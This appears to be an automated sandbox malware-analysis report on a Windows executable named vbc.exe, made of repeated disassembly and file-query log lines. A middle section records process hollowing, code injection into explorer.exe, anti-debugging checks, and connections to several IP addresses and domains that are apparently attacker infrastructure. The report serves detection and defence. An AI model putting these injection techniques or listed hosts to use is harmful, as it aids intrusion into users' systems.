Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0168740D mov eax, dword ptr fs:[00000030h] 6_2_0168740D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0168740D mov eax, dword ptr fs:[00000030h] 6_2_0168740D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0168740D mov eax, dword ptr fs:[00000030h] 6_2_0168740D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636C0A mov eax, dword ptr fs:[00000030h] 6_2_01636C0A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636C0A mov eax, dword ptr fs:[00000030h] 6_2_01636C0A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636C0A mov eax, dword ptr fs:[00000030h] 6_2_01636C0A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636C0A mov eax, dword ptr fs:[00000030h] 6_2_01636C0A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EBC2C mov eax, dword ptr fs:[00000030h] 6_2_015EBC2C
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636CF0 mov eax, dword ptr fs:[00000030h] 6_2_01636CF0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636CF0 mov eax, dword ptr fs:[00000030h] 6_2_01636CF0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636CF0 mov eax, dword ptr fs:[00000030h] 6_2_01636CF0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016714FB mov eax, dword ptr fs:[00000030h] 6_2_016714FB
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01688CD6 mov eax, dword ptr fs:[00000030h] 6_2_01688CD6
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C849B mov eax, dword ptr fs:[00000030h] 6_2_015C849B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01688F6A mov eax, dword ptr fs:[00000030h] 6_2_01688F6A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015CEF40 mov eax, dword ptr fs:[00000030h] 6_2_015CEF40
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015CFF60 mov eax, dword ptr fs:[00000030h] 6_2_015CFF60
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DF716 mov eax, dword ptr fs:[00000030h] 6_2_015DF716
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EA70E mov eax, dword ptr fs:[00000030h] 6_2_015EA70E
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EA70E mov eax, dword ptr fs:[00000030h] 6_2_015EA70E
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DB73D mov eax, dword ptr fs:[00000030h] 6_2_015DB73D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DB73D mov eax, dword ptr fs:[00000030h] 6_2_015DB73D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0168070D mov eax, dword ptr fs:[00000030h] 6_2_0168070D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0168070D mov eax, dword ptr fs:[00000030h] 6_2_0168070D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EE730 mov eax, dword ptr fs:[00000030h] 6_2_015EE730
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0164FF10 mov eax, dword ptr fs:[00000030h] 6_2_0164FF10
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0164FF10 mov eax, dword ptr fs:[00000030h] 6_2_0164FF10
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B4F2E mov eax, dword ptr fs:[00000030h] 6_2_015B4F2E
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B4F2E mov eax, dword ptr fs:[00000030h] 6_2_015B4F2E
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F37F5 mov eax, dword ptr fs:[00000030h] 6_2_015F37F5
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C8794 mov eax, dword ptr fs:[00000030h] 6_2_015C8794
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01637794 mov eax, dword ptr fs:[00000030h] 6_2_01637794
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01637794 mov eax, dword ptr fs:[00000030h] 6_2_01637794
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01637794 mov eax, dword ptr fs:[00000030h] 6_2_01637794
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h] 6_2_015C7E41
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h] 6_2_015C7E41
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h] 6_2_015C7E41
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h] 6_2_015C7E41
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h] 6_2_015C7E41
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h] 6_2_015C7E41
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167AE44 mov eax, dword ptr fs:[00000030h] 6_2_0167AE44
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167AE44 mov eax, dword ptr fs:[00000030h] 6_2_0167AE44
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h] 6_2_015DAE73
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h] 6_2_015DAE73
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h] 6_2_015DAE73
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h] 6_2_015DAE73
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h] 6_2_015DAE73
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C766D mov eax, dword ptr fs:[00000030h] 6_2_015C766D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EA61C mov eax, dword ptr fs:[00000030h] 6_2_015EA61C
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EA61C mov eax, dword ptr fs:[00000030h] 6_2_015EA61C
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0166FE3F mov eax, dword ptr fs:[00000030h] 6_2_0166FE3F
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BC600 mov eax, dword ptr fs:[00000030h] 6_2_015BC600
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BC600 mov eax, dword ptr fs:[00000030h] 6_2_015BC600
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BC600 mov eax, dword ptr fs:[00000030h] 6_2_015BC600
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E8E00 mov eax, dword ptr fs:[00000030h] 6_2_015E8E00
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671608 mov eax, dword ptr fs:[00000030h] 6_2_01671608
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BE620 mov eax, dword ptr fs:[00000030h] 6_2_015BE620
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E36CC mov eax, dword ptr fs:[00000030h] 6_2_015E36CC
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F8EC7 mov eax, dword ptr fs:[00000030h] 6_2_015F8EC7
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0166FEC0 mov eax, dword ptr fs:[00000030h] 6_2_0166FEC0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01688ED6 mov eax, dword ptr fs:[00000030h] 6_2_01688ED6
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E16E0 mov ecx, dword ptr fs:[00000030h] 6_2_015E16E0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C76E2 mov eax, dword ptr fs:[00000030h] 6_2_015C76E2
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016346A7 mov eax, dword ptr fs:[00000030h] 6_2_016346A7
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01680EA5 mov eax, dword ptr fs:[00000030h] 6_2_01680EA5
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01680EA5 mov eax, dword ptr fs:[00000030h] 6_2_01680EA5
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01680EA5 mov eax, dword ptr fs:[00000030h] 6_2_01680EA5
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0164FE87 mov eax, dword ptr fs:[00000030h] 6_2_0164FE87
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_015F9910
Source: C:\Users\user\Desktop\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 192.185.131.238 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 108.167.169.56 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 103.141.97.24 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.funwave.info
Source: C:\Windows\explorer.exe Domain query: www.tadeumilhosrp.com
Source: C:\Windows\explorer.exe Domain query: www.reprograme-se10x.com
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\vbc.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: AF0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\vbc.exe Memory written: C:\Users\user\Desktop\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\vbc.exe Thread register set: target process: 3688 Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3688 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe Jump to behavior
Source: explorer.exe, 00000007.00000000.534743578.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.534282769.000000000081C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.451806770.0000000000D70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.534743578.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.410398740.0000000000778000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.451806770.0000000000D70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.534743578.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.451806770.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.472236722.0000000000D70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000000.534743578.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.451806770.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.472236722.0000000000D70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Users\user\Desktop\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
